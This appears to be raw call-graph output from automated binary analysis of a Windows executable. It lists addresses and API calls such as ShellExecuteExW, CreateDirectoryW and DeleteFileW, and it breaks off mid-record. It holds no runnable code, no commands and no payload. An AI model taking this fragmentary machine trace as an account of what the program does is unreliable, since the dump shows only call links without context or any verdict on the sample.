7ff7e5f0e6a4 33 API calls _handle_error 21353->21907 21908 7ff7e5ef8b28 21353->21908 21916 7ff7e5ef7254 CompareStringW 21353->21916 21917 7ff7e5ef8be4 47 API calls 21353->21917 21355 7ff7e5f134dd 21354->21355 21356 7ff7e5ef1c80 33 API calls 21355->21356 21358 7ff7e5f134f3 21356->21358 21357 7ff7e5f13528 21949 7ff7e5f09a70 21357->21949 21358->21357 21359 7ff7e5ef1c80 33 API calls 21358->21359 21359->21357 22384 7ff7e5f0c12c 21362->22384 21365 7ff7e5f13007 21367 7ff7e5f15c30 _handle_error 8 API calls 21365->21367 21366 7ff7e5f12f17 GetWindow 21373 7ff7e5f12f32 21366->21373 21368 7ff7e5f0f9eb 21367->21368 21368->20767 21368->20768 21369 7ff7e5f12f3e GetClassNameW 22389 7ff7e5f00aa0 CompareStringW 21369->22389 21371 7ff7e5f12f67 GetWindowLongPtrW 21372 7ff7e5f12fe6 GetWindow 21371->21372 21374 7ff7e5f12f79 SendMessageW 21371->21374 21372->21365 21372->21373 21373->21365 21373->21369 21373->21371 21373->21372 21374->21372 21375 7ff7e5f12f95 GetObjectW 21374->21375 22390 7ff7e5f0c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21375->22390 21377 7ff7e5f12fb1 22391 7ff7e5f0c15c 21377->22391 22395 7ff7e5f0ca30 16 API calls _handle_error 21377->22395 21380 7ff7e5f12fc9 SendMessageW DeleteObject 21380->21372 21382 7ff7e5ef7a4c 21381->21382 21387 7ff7e5ef7ad9 21381->21387 21383 7ff7e5ef13c4 33 API calls 21382->21383 21384 7ff7e5ef7a67 GetCurrentDirectoryW 21383->21384 21385 7ff7e5ef7a8d 21384->21385 21386 7ff7e5ef1c80 33 API calls 21385->21386 21388 7ff7e5ef7a9b 21386->21388 21387->20780 21388->21387 21389 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21388->21389 21390 7ff7e5ef7af5 21389->21390 21392 7ff7e5ef212a SetWindowTextW 21391->21392 21393 7ff7e5ef2127 21391->21393 21394 7ff7e5f5f290 21392->21394 21393->21392 21395->20789 21397 7ff7e5ef2116 SetDlgItemTextW 21396->21397 21398 7ff7e5ef2113 21396->21398 21398->21397 21400 7ff7e5ef2344 21399->21400 21406 7ff7e5ef23f8 21399->21406 21403 7ff7e5ef23f3 21400->21403 21405 7ff7e5ef2352 BuildCatchObjectHelperInternal 21400->21405 21407 7ff7e5ef23a1 21400->21407 22398 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21403->22398 21405->20805 22399 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21406->22399 21407->21405 21408 7ff7e5f15ae0 4 API calls 21407->21408 21408->21405 21409->20815 21410->20832 21411->20859 21413 7ff7e5ef5890 51 API calls 21412->21413 21414 7ff7e5ef5885 21413->21414 21414->20869 21414->20886 21415->20869 21417 7ff7e5ef13c4 33 API calls 21416->21417 21418 7ff7e5ef7c45 21417->21418 21419 7ff7e5ef7c48 GetModuleFileNameW 21418->21419 21422 7ff7e5ef7c98 21418->21422 21420 7ff7e5ef7c63 21419->21420 21421 7ff7e5ef7c9a 21419->21421 21420->21418 21421->21422 21423 7ff7e5ef12bc 33 API calls 21422->21423 21425 7ff7e5ef7cc2 21423->21425 21424 7ff7e5ef7cfa 21424->20927 21425->21424 21426 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21425->21426 21427 7ff7e5ef7d1c 21426->21427 21428->20941 21429->20955 21431 7ff7e5ef1cc6 21430->21431 21432 7ff7e5ef1c9b BuildCatchObjectHelperInternal 21430->21432 22400 7ff7e5ef1464 33 API calls 3 library calls 21431->22400 21432->20962 21434->20974 21435->20986 21436->20996 21437->21003 21438->21011 21440 7ff7e5f16df0 21439->21440 21440->21016 21442 7ff7e5ef6e7c 21441->21442 21443 7ff7e5ef6e95 21442->21443 21444 7ff7e5ef6ed6 21442->21444 21447 7ff7e5ef7050 4 API calls 21443->21447 22401 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21444->22401 21448 7ff7e5ef6ec3 21447->21448 21449 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 21448->21449 21449->20944 21450->20972 21452->20904 21454 7ff7e5ef1c55 21453->21454 21456 7ff7e5ef1c29 BuildCatchObjectHelperInternal 21453->21456 22402 7ff7e5ef15a8 33 API calls 3 library calls 21454->22402 21456->20916 21458 7ff7e5f15c39 21457->21458 21459 7ff7e5f0fea0 21458->21459 21460 7ff7e5f15d20 IsProcessorFeaturePresent 21458->21460 21461 7ff7e5f15d38 21460->21461 22403 7ff7e5f15f14 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 21461->22403 21463 7ff7e5f15d4b 22404 7ff7e5f15ce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21463->22404 22405 7ff7e5f1adcc 31 API calls _invalid_parameter_noinfo_noreturn 21466->22405 21468 7ff7e5f1aead 22406 7ff7e5f1aec4 16 API calls abort 21468->22406 21472 7ff7e5ef8e49 21471->21472 21474 7ff7e5ef8e32 21471->21474 22407 7ff7e5ef3550 33 API calls 21472->22407 21474->20973 21475->21033 21479 7ff7e5ef530e 21476->21479 21477 7ff7e5ef54a1 22409 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21477->22409 21479->21477 21481 7ff7e5ef549c 21479->21481 21482 7ff7e5ef5418 21479->21482 21484 7ff7e5ef5314 BuildCatchObjectHelperInternal 21479->21484 22408 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21481->22408 21482->21484 21485 7ff7e5f15ae0 4 API calls 21482->21485 21484->21041 21485->21484 21486->21062 21487->21072 21488->21074 21489->21089 21490->21095 21516 7ff7e5ef61e8 21491->21516 21495 7ff7e5efa989 21522 7ff7e5ef9808 21495->21522 21498 7ff7e5efaa03 21500 7ff7e5efaac2 21498->21500 21501 7ff7e5efaa0c GetWindowLongPtrW 21498->21501 21499 7ff7e5efaaf2 GetSystemMetrics GetWindow 21502 7ff7e5efac21 21499->21502 21515 7ff7e5efab1d 21499->21515 21542 7ff7e5ef99a8 21500->21542 21541 7ff7e5f5f270 21501->21541 21503 7ff7e5f15c30 _handle_error 8 API calls 21502->21503 21507 7ff7e5efac30 21503->21507 21506 7ff7e5efa919 21506->21495 21513 7ff7e5efa96a SetDlgItemTextW 21506->21513 21537 7ff7e5ef9c00 21506->21537 21507->21102 21511 7ff7e5efaae5 SetWindowTextW 21511->21499 21512 7ff7e5efab3e GetWindowRect 21512->21515 21513->21506 21514 7ff7e5efac00 GetWindow 21514->21502 21514->21515 21515->21502 21515->21512 21515->21514 21517 7ff7e5ef620d _snwprintf 21516->21517 21551 7ff7e5f1d348 21517->21551 21520 7ff7e5f00688 WideCharToMultiByte 21521 7ff7e5f006ca 21520->21521 21521->21506 21523 7ff7e5ef99a8 47 API calls 21522->21523 21526 7ff7e5ef984f 21523->21526 21524 7ff7e5f15c30 _handle_error 8 API calls 21525 7ff7e5ef998e GetWindowRect GetClientRect 21524->21525 21525->21498 21525->21499 21527 7ff7e5ef12bc 33 API calls 21526->21527 21535 7ff7e5ef995a 21526->21535 21528 7ff7e5ef989c 21527->21528 21529 7ff7e5ef99a1 21528->21529 21530 7ff7e5ef12bc 33 API calls 21528->21530 21531 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21529->21531 21533 7ff7e5ef9914 21530->21533 21532 7ff7e5ef99a7 21531->21532 21534 7ff7e5ef999c 21533->21534 21533->21535 21536 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21534->21536 21535->21524 21536->21529 21538 7ff7e5ef9c40 21537->21538 21540 7ff7e5ef9c69 21537->21540 21590 7ff7e5f1d62c 31 API calls 2 library calls 21538->21590 21540->21506 21543 7ff7e5ef61e8 swprintf 46 API calls 21542->21543 21544 7ff7e5ef99eb 21543->21544 21545 7ff7e5f00688 WideCharToMultiByte 21544->21545 21546 7ff7e5ef9a03 21545->21546 21547 7ff7e5ef9c00 31 API calls 21546->21547 21548 7ff7e5ef9a1b 21547->21548 21549 7ff7e5f15c30 _handle_error 8 API calls 21548->21549 21550 7ff7e5ef9a2b 21549->21550 21550->21499 21550->21511 21552 7ff7e5f1d38e 21551->21552 21553 7ff7e5f1d3a6 21551->21553 21578 7ff7e5f20bac 15 API calls _invalid_parameter_noinfo_noreturn 21552->21578 21553->21552 21555 7ff7e5f1d3b0 21553->21555 21580 7ff7e5f1b348 35 API calls 2 library calls 21555->21580 21556 7ff7e5f1d393 21579 7ff7e5f1ae74 31 API calls _invalid_parameter_noinfo_noreturn 21556->21579 21559 7ff7e5f1d3c1 memcpy_s 21581 7ff7e5f1b2c8 15 API calls _set_errno_from_matherr 21559->21581 21560 7ff7e5f15c30 _handle_error 8 API calls 21561 7ff7e5ef6229 21560->21561 21561->21520 21563 7ff7e5f1d42c 21582 7ff7e5f1b750 46 API calls 3 library calls 21563->21582 21565 7ff7e5f1d435 21566 7ff7e5f1d46c 21565->21566 21567 7ff7e5f1d43d 21565->21567 21569 7ff7e5f1d472 21566->21569 21570 7ff7e5f1d4c4 21566->21570 21571 7ff7e5f1d4ea 21566->21571 21572 7ff7e5f1d47b 21566->21572 21583 7ff7e5f20e1c 21567->21583 21569->21570 21569->21572 21574 7ff7e5f20e1c __free_lconv_mon 15 API calls 21570->21574 21571->21570 21575 7ff7e5f1d4f4 21571->21575 21573 7ff7e5f20e1c __free_lconv_mon 15 API calls 21572->21573 21577 7ff7e5f1d39e 21573->21577 21574->21577 21576 7ff7e5f20e1c __free_lconv_mon 15 API calls 21575->21576 21576->21577 21577->21560 21578->21556 21579->21577 21580->21559 21581->21563 21582->21565 21584 7ff7e5f20e21 RtlFreeHeap 21583->21584 21588 7ff7e5f20e51 __free_lconv_mon 21583->21588 21585 7ff7e5f20e3c 21584->21585 21584->21588 21589 7ff7e5f20bac 15 API calls _invalid_parameter_noinfo_noreturn 21585->21589 21587 7ff7e5f20e41 GetLastError 21587->21588 21588->21577 21589->21587 21590->21540 21603 7ff7e5ef13c4 21591->21603 21594 7ff7e5ef2094 21595 7ff7e5ef12bc 33 API calls 21594->21595 21598 7ff7e5ef20a2 21595->21598 21596 7ff7e5ef20dd 21597 7ff7e5f15c30 _handle_error 8 API calls 21596->21597 21599 7ff7e5ef20f3 21597->21599 21598->21596 21600 7ff7e5ef2105 21598->21600 21599->21110 21601 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21600->21601 21602 7ff7e5ef210a 21601->21602 21604 7ff7e5ef13cd 21603->21604 21610 7ff7e5ef144d GetWindowTextW 21603->21610 21605 7ff7e5ef145d 21604->21605 21608 7ff7e5ef13ee memcpy_s 21604->21608 21612 7ff7e5ef1be8 33 API calls std::_Xinvalid_argument 21605->21612 21611 7ff7e5ef196c 31 API calls _invalid_parameter_noinfo_noreturn 21608->21611 21610->21594 21611->21610 21620 7ff7e5ef9a38 21613->21620 21616 7ff7e5ef9c00 31 API calls 21617 7ff7e5ef9bd9 21616->21617 21618 7ff7e5f15c30 _handle_error 8 API calls 21617->21618 21619 7ff7e5ef9bf2 21618->21619 21619->21124 21619->21125 21621 7ff7e5ef9a92 21620->21621 21629 7ff7e5ef9b30 21620->21629 21622 7ff7e5ef9ac0 21621->21622 21623 7ff7e5f00688 WideCharToMultiByte 21621->21623 21626 7ff7e5ef9aef 21622->21626 21630 7ff7e5efae88 45 API calls _snwprintf 21622->21630 21623->21622 21624 7ff7e5f15c30 _handle_error 8 API calls 21625 7ff7e5ef9b64 21624->21625 21625->21616 21625->21617 21631 7ff7e5f1d62c 31 API calls 2 library calls 21626->21631 21629->21624 21630->21626 21631->21629 21633 7ff7e5f15aeb 21632->21633 21634 7ff7e5f15b04 21633->21634 21635 7ff7e5f1f0c8 _invalid_parameter_noinfo_noreturn 2 API calls 21633->21635 21636 7ff7e5f15b0a 21633->21636 21634->21130 21635->21633 21637 7ff7e5f15b15 21636->21637 21643 7ff7e5f1674c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21636->21643 21644 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21637->21644 21643->21637 21646 7ff7e5f0e98c GetMessageW 21645->21646 21647 7ff7e5f0e9d0 GetDlgItem 21645->21647 21648 7ff7e5f0e9ba TranslateMessage DispatchMessageW 21646->21648 21649 7ff7e5f0e9ab IsDialogMessageW 21646->21649 21647->21140 21647->21141 21648->21647 21649->21647 21649->21648 21652 7ff7e5ef5c8f 21650->21652 21651 7ff7e5ef5cbc 21670 7ff7e5ef5890 21651->21670 21652->21651 21653 7ff7e5ef5ca8 CreateDirectoryW 21652->21653 21653->21651 21655 7ff7e5ef5d59 21653->21655 21658 7ff7e5ef5d69 21655->21658 21684 7ff7e5ef5ff4 21655->21684 21657 7ff7e5ef5d6d GetLastError 21657->21658 21662 7ff7e5f15c30 _handle_error 8 API calls 21658->21662 21665 7ff7e5ef5d95 21662->21665 21663 7ff7e5ef5cfc CreateDirectoryW 21664 7ff7e5ef5d17 21663->21664 21666 7ff7e5ef5d50 21664->21666 21667 7ff7e5ef5daa 21664->21667 21665->21159 21666->21655 21666->21657 21668 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21667->21668 21669 7ff7e5ef5daf 21668->21669 21671 7ff7e5ef58bb GetFileAttributesW 21670->21671 21672 7ff7e5ef58b8 21670->21672 21673 7ff7e5ef5949 21671->21673 21674 7ff7e5ef58cc 21671->21674 21672->21671 21675 7ff7e5f15c30 _handle_error 8 API calls 21673->21675 21676 7ff7e5ef80b0 49 API calls 21674->21676 21677 7ff7e5ef595d 21675->21677 21678 7ff7e5ef58f3 21676->21678 21677->21657 21698 7ff7e5ef80b0 21677->21698 21679 7ff7e5ef5910 21678->21679 21680 7ff7e5ef58f7 GetFileAttributesW 21678->21680 21679->21673 21681 7ff7e5ef596d 21679->21681 21680->21679 21682 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21681->21682 21683 7ff7e5ef5972 21682->21683 21685 7ff7e5ef601e SetFileAttributesW 21684->21685 21686 7ff7e5ef601b 21684->21686 21687 7ff7e5ef6034 21685->21687 21694 7ff7e5ef60b5 21685->21694 21686->21685 21689 7ff7e5ef80b0 49 API calls 21687->21689 21688 7ff7e5f15c30 _handle_error 8 API calls 21690 7ff7e5ef60ca 21688->21690 21691 7ff7e5ef6059 21689->21691 21690->21658 21692 7ff7e5ef605d SetFileAttributesW 21691->21692 21693 7ff7e5ef607c 21691->21693 21692->21693 21693->21694 21695 7ff7e5ef60da 21693->21695 21694->21688 21696 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21695->21696 21697 7ff7e5ef60df 21696->21697 21699 7ff7e5ef80ef 21698->21699 21716 7ff7e5ef80e8 21698->21716 21701 7ff7e5ef12bc 33 API calls 21699->21701 21700 7ff7e5f15c30 _handle_error 8 API calls 21702 7ff7e5ef5cf8 21700->21702 21703 7ff7e5ef811a 21701->21703 21702->21663 21702->21664 21704 7ff7e5ef836b 21703->21704 21705 7ff7e5ef813a 21703->21705 21706 7ff7e5ef7a28 35 API calls 21704->21706 21707 7ff7e5ef8154 21705->21707 21729 7ff7e5ef81ed 21705->21729 21709 7ff7e5ef838a 21706->21709 21708 7ff7e5ef874f 21707->21708 21771 7ff7e5ef7050 21707->21771 21790 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21708->21790 21710 7ff7e5ef8593 21709->21710 21713 7ff7e5ef83bf 21709->21713 21768 7ff7e5ef81e8 21709->21768 21712 7ff7e5ef8773 21710->21712 21718 7ff7e5ef7050 4 API calls 21710->21718 21793 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21712->21793 21719 7ff7e5ef8761 21713->21719 21726 7ff7e5ef7050 4 API calls 21713->21726 21714 7ff7e5ef8755 21727 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21714->21727 21716->21700 21717 7ff7e5ef81a7 21730 7ff7e5ef1b70 31 API calls 21717->21730 21737 7ff7e5ef81b9 BuildCatchObjectHelperInternal 21717->21737 21724 7ff7e5ef85fa 21718->21724 21791 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21719->21791 21720 7ff7e5ef8779 21722 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21720->21722 21728 7ff7e5ef877f 21722->21728 21723 7ff7e5ef874a 21734 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21723->21734 21788 7ff7e5ef11ec 33 API calls BuildCatchObjectHelperInternal 21724->21788 21748 7ff7e5ef841a BuildCatchObjectHelperInternal 21726->21748 21735 7ff7e5ef875b 21727->21735 21741 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21728->21741 21736 7ff7e5ef12bc 33 API calls 21729->21736 21729->21768 21730->21737 21732 7ff7e5ef8767 21744 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21732->21744 21733 7ff7e5ef1b70 31 API calls 21733->21768 21734->21708 21739 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21735->21739 21742 7ff7e5ef8262 21736->21742 21737->21733 21738 7ff7e5ef860d 21789 7ff7e5ef6d64 33 API calls BuildCatchObjectHelperInternal 21738->21789 21739->21719 21740 7ff7e5ef1b70 31 API calls 21754 7ff7e5ef8499 21740->21754 21745 7ff7e5ef8785 21741->21745 21779 7ff7e5ef6dd8 21742->21779 21747 7ff7e5ef876d 21744->21747 21792 7ff7e5ef353c 47 API calls 21747->21792 21748->21732 21748->21740 21750 7ff7e5ef1b70 31 API calls 21753 7ff7e5ef8690 21750->21753 21751 7ff7e5ef52c0 33 API calls 21766 7ff7e5ef828d BuildCatchObjectHelperInternal 21751->21766 21756 7ff7e5ef1b70 31 API calls 21753->21756 21759 7ff7e5ef84c5 21754->21759 21787 7ff7e5ef1734 33 API calls 4 library calls 21754->21787 21755 7ff7e5ef861d BuildCatchObjectHelperInternal 21755->21728 21755->21750 21758 7ff7e5ef869a 21756->21758 21757 7ff7e5ef1b70 31 API calls 21761 7ff7e5ef8311 21757->21761 21762 7ff7e5ef1b70 31 API calls 21758->21762 21759->21747 21763 7ff7e5ef12bc 33 API calls 21759->21763 21764 7ff7e5ef1b70 31 API calls 21761->21764 21762->21768 21765 7ff7e5ef8566 21763->21765 21764->21768 21767 7ff7e5ef1c04 33 API calls 21765->21767 21766->21735 21766->21757 21769 7ff7e5ef8583 21767->21769 21768->21714 21768->21716 21768->21720 21768->21723 21770 7ff7e5ef1b70 31 API calls 21769->21770 21770->21768 21772 7ff7e5ef709d 21771->21772 21775 7ff7e5ef70b2 BuildCatchObjectHelperInternal 21771->21775 21773 7ff7e5ef70e4 21772->21773 21774 7ff7e5ef715d 21772->21774 21772->21775 21773->21775 21778 7ff7e5f15ae0 4 API calls 21773->21778 21794 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21774->21794 21775->21717 21778->21775 21780 7ff7e5ef6e01 21779->21780 21781 7ff7e5ef6e56 21780->21781 21783 7ff7e5ef6e13 21780->21783 21795 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21781->21795 21784 7ff7e5ef7050 4 API calls 21783->21784 21786 7ff7e5ef6e3e 21784->21786 21786->21751 21787->21759 21788->21738 21789->21755 21797 7ff7e5ef610f 21796->21797 21798 7ff7e5ef61da 21796->21798 21802 7ff7e5ef611f BuildCatchObjectHelperInternal 21797->21802 21803 7ff7e5ef5004 33 API calls 2 library calls 21797->21803 21804 7ff7e5ef353c 47 API calls 21798->21804 21802->21175 21803->21802 21807 7ff7e5ef42ea 21805->21807 21808 7ff7e5ef4302 21805->21808 21806 7ff7e5ef4326 21806->21198 21807->21808 21809 7ff7e5ef42f6 CloseHandle 21807->21809 21808->21806 21811 7ff7e5ef3a64 99 API calls 21808->21811 21809->21808 21811->21806 21813 7ff7e5f0e586 21812->21813 21814 7ff7e5f0e57f 21812->21814 21813->21814 21933 7ff7e5ef1734 33 API calls 4 library calls 21813->21933 21814->21353 21816->21353 21822 7ff7e5f13079 memcpy_s 21817->21822 21833 7ff7e5f133cd 21817->21833 21818 7ff7e5ef1b70 31 API calls 21819 7ff7e5f133ec 21818->21819 21820 7ff7e5f15c30 _handle_error 8 API calls 21819->21820 21821 7ff7e5f133f8 21820->21821 21821->21294 21824 7ff7e5f131d4 21822->21824 21940 7ff7e5f00aa0 CompareStringW 21822->21940 21825 7ff7e5ef12bc 33 API calls 21824->21825 21826 7ff7e5f13210 21825->21826 21827 7ff7e5ef587c 51 API calls 21826->21827 21828 7ff7e5f1321a 21827->21828 21829 7ff7e5ef1b70 31 API calls 21828->21829 21834 7ff7e5f13225 21829->21834 21830 7ff7e5f13292 ShellExecuteExW 21831 7ff7e5f132a5 21830->21831 21832 7ff7e5f13396 21830->21832 21835 7ff7e5f132de WaitForInputIdle 21831->21835 21836 7ff7e5f132c4 IsWindowVisible 21831->21836 21838 7ff7e5f13333 CloseHandle 21831->21838 21832->21833 21841 7ff7e5f1344b 21832->21841 21833->21818 21834->21830 21837 7ff7e5ef12bc 33 API calls 21834->21837 21934 7ff7e5f13928 21835->21934 21836->21835 21839 7ff7e5f132d1 ShowWindow 21836->21839 21842 7ff7e5f13267 21837->21842 21846 7ff7e5f13342 21838->21846 21847 7ff7e5f13351 21838->21847 21839->21835 21844 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21841->21844 21941 7ff7e5ef72ac 53 API calls 2 library calls 21842->21941 21843 7ff7e5f132f6 21843->21838 21851 7ff7e5f13304 GetExitCodeProcess 21843->21851 21849 7ff7e5f13450 21844->21849 21942 7ff7e5f00aa0 CompareStringW 21846->21942 21847->21832 21854 7ff7e5f13387 ShowWindow 21847->21854 21850 7ff7e5f13275 21852 7ff7e5ef1b70 31 API calls 21850->21852 21851->21838 21855 7ff7e5f13317 21851->21855 21853 7ff7e5f1327f 21852->21853 21853->21830 21854->21832 21855->21838 21856->21353 21857->21353 21858->21353 21859->21345 21860->21353 21861->21353 21863->21286 21864->21353 21866 7ff7e5ef8936 21865->21866 21867 7ff7e5ef2314 33 API calls 21866->21867 21869 7ff7e5ef8946 21867->21869 21868 7ff7e5ef8987 21870 7ff7e5ef1c04 33 API calls 21868->21870 21869->21868 21943 7ff7e5ef1734 33 API calls 4 library calls 21869->21943 21872 7ff7e5ef89cd 21870->21872 21873 7ff7e5ef89f0 21872->21873 21874 7ff7e5ef1c80 33 API calls 21872->21874 21875 7ff7e5ef8a28 21873->21875 21878 7ff7e5ef8a44 21873->21878 21874->21873 21876 7ff7e5f15c30 _handle_error 8 API calls 21875->21876 21877 7ff7e5ef8a39 21876->21877 21877->21353 21879 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21878->21879 21880 7ff7e5ef8a49 21879->21880 21881->21353 21882->21353 21884 7ff7e5ef887a 21883->21884 21944 7ff7e5ef367c 21884->21944 21887->21320 21889 7ff7e5ef57bb DeleteFileW 21888->21889 21890 7ff7e5ef57b8 21888->21890 21891 7ff7e5ef57d1 21889->21891 21899 7ff7e5ef5850 21889->21899 21890->21889 21893 7ff7e5ef80b0 49 API calls 21891->21893 21892 7ff7e5f15c30 _handle_error 8 API calls 21894 7ff7e5ef5865 21892->21894 21895 7ff7e5ef57f6 21893->21895 21894->21353 21896 7ff7e5ef57fa DeleteFileW 21895->21896 21897 7ff7e5ef5817 21895->21897 21896->21897 21898 7ff7e5ef5875 21897->21898 21897->21899 21900 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21898->21900 21899->21892 21901 7ff7e5ef587a 21900->21901 21902->21353 21904->21353 21905->21353 21906->21353 21907->21353 21909 7ff7e5ef8b40 21908->21909 21910 7ff7e5ef8b89 21909->21910 21911 7ff7e5ef8b57 21909->21911 21948 7ff7e5ef353c 47 API calls 21910->21948 21913 7ff7e5ef12bc 33 API calls 21911->21913 21915 7ff7e5ef8b7b 21913->21915 21915->21353 21916->21353 21917->21353 21920 7ff7e5efd156 21918->21920 21919 7ff7e5efd18a 21919->21342 21920->21919 21921 7ff7e5ef1734 33 API calls 21920->21921 21921->21920 21922->21239 21933->21813 21935 7ff7e5f1397b WaitForSingleObject 21934->21935 21936 7ff7e5f1398d 21935->21936 21937 7ff7e5f13933 PeekMessageW 21935->21937 21936->21843 21938 7ff7e5f13978 21937->21938 21939 7ff7e5f1394f GetMessageW TranslateMessage DispatchMessageW 21937->21939 21938->21935 21939->21938 21940->21824 21941->21850 21942->21847 21943->21868 21947 7ff7e5ef36c6 memcpy_s 21944->21947 21945 7ff7e5f15c30 _handle_error 8 API calls 21946 7ff7e5ef378a 21945->21946 21946->21353 21947->21945 21950 7ff7e5f09a80 memcpy_s _snwprintf 21949->21950 21967 7ff7e5efbb9c 21950->21967 21952 7ff7e5f09b1e memcpy_s 21970 7ff7e5f09518 21952->21970 21956 7ff7e5f09b88 21957 7ff7e5f09bcb 21956->21957 21959 7ff7e5f09cf4 21956->21959 21981 7ff7e5f09cfc 21957->21981 21961 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21959->21961 21963 7ff7e5f09cf9 21961->21963 21964 7ff7e5f15c30 _handle_error 8 API calls 21965 7ff7e5f09cde 21964->21965 21965->21001 21966 7ff7e5f09bd9 21966->21964 21968 7ff7e5ef13c4 33 API calls 21967->21968 21969 7ff7e5efbbc1 21968->21969 21969->21952 21971 7ff7e5f0959f BuildCatchObjectHelperInternal 21970->21971 21971->21971 21972 7ff7e5ef1b70 31 API calls 21971->21972 21973 7ff7e5f097d0 BuildCatchObjectHelperInternal 21971->21973 21972->21973 21974 7ff7e5f0986f 21973->21974 22009 7ff7e5f07fa8 33 API calls 21973->22009 21976 7ff7e5efbbf8 21974->21976 21977 7ff7e5efbc06 shared_ptr 21976->21977 21978 7ff7e5efbc39 21977->21978 21979 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21977->21979 21978->21956 21980 7ff7e5efbc5a 21979->21980 21982 7ff7e5f09d0a 21981->21982 21983 7ff7e5f09bd5 21982->21983 22010 7ff7e5ef3c7c 82 API calls 21982->22010 21983->21966 21985 7ff7e5f06d28 21983->21985 22011 7ff7e5f076f8 21985->22011 21990 7ff7e5ef2314 33 API calls 21999 7ff7e5f06d85 21990->21999 21991 7ff7e5f15c30 _handle_error 8 API calls 21992 7ff7e5f06fa2 21991->21992 21992->21966 21995 7ff7e5f06f1f 22058 7ff7e5f0524c 21995->22058 21996 7ff7e5f06fc4 22001 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21996->22001 21997 7ff7e5f06ea0 21997->21995 21997->21996 22000 7ff7e5f06fbf 21997->22000 21999->21990 21999->21996 21999->21997 21999->22000 22008 7ff7e5f06f52 21999->22008 22040 7ff7e5f01dd0 21999->22040 22051 7ff7e5ef6288 21999->22051 22003 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22000->22003 22004 7ff7e5f06fca 22001->22004 22002 7ff7e5f06f37 22005 7ff7e5f06f54 22002->22005 22006 7ff7e5f06f43 22002->22006 22003->21996 22005->22008 22066 7ff7e5ef3ca0 100 API calls 22005->22066 22065 7ff7e5ef39e0 82 API calls 22006->22065 22008->21991 22009->21974 22010->21983 22012 7ff7e5ef6288 55 API calls 22011->22012 22013 7ff7e5f07760 22012->22013 22019 7ff7e5f0777b 22013->22019 22067 7ff7e5f04e68 22013->22067 22016 7ff7e5f079a6 22020 7ff7e5f15c30 _handle_error 8 API calls 22016->22020 22019->22016 22021 7ff7e5f079db 22019->22021 22022 7ff7e5f06d5a 22020->22022 22024 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22021->22024 22022->21999 22022->22005 22064 7ff7e5ef39e0 82 API calls 22022->22064 22026 7ff7e5f079e0 22024->22026 22030 7ff7e5f0524c 103 API calls 22031 7ff7e5f0787a 22030->22031 22031->22019 22118 7ff7e5f0502c 22031->22118 22034 7ff7e5f0524c 103 API calls 22035 7ff7e5f078e1 22034->22035 22035->22019 22036 7ff7e5f0502c 120 API calls 22035->22036 22037 7ff7e5f078c0 22036->22037 22037->22019 22124 7ff7e5ef39e0 82 API calls 22037->22124 22041 7ff7e5f01bf4 64 API calls 22040->22041 22042 7ff7e5f01df9 22041->22042 22043 7ff7e5ef61e8 swprintf 46 API calls 22042->22043 22044 7ff7e5f01e2a 22043->22044 22045 7ff7e5ef12bc 33 API calls 22044->22045 22046 7ff7e5f01e55 22045->22046 22047 7ff7e5ef8d18 47 API calls 22046->22047 22048 7ff7e5f01e62 22047->22048 22049 7ff7e5f15c30 _handle_error 8 API calls 22048->22049 22050 7ff7e5f01e72 22049->22050 22050->21999 22052 7ff7e5ef885c 8 API calls 22051->22052 22053 7ff7e5ef62a1 22052->22053 22054 7ff7e5ef62cf 22053->22054 22345 7ff7e5ef647c 22053->22345 22054->21999 22057 7ff7e5ef62ba FindClose 22057->22054 22059 7ff7e5f05280 22058->22059 22060 7ff7e5f0528a 22058->22060 22059->22002 22060->22059 22062 7ff7e5ef4c40 101 API calls 22060->22062 22061 7ff7e5f052ae 22063 7ff7e5ef4d50 101 API calls 22061->22063 22062->22061 22063->22059 22064->21999 22065->22008 22068 7ff7e5f15ae0 4 API calls 22067->22068 22069 7ff7e5f04e76 22068->22069 22125 7ff7e5ef46a0 22069->22125 22071 7ff7e5f04ed4 22071->22019 22074 7ff7e5f09db0 22071->22074 22144 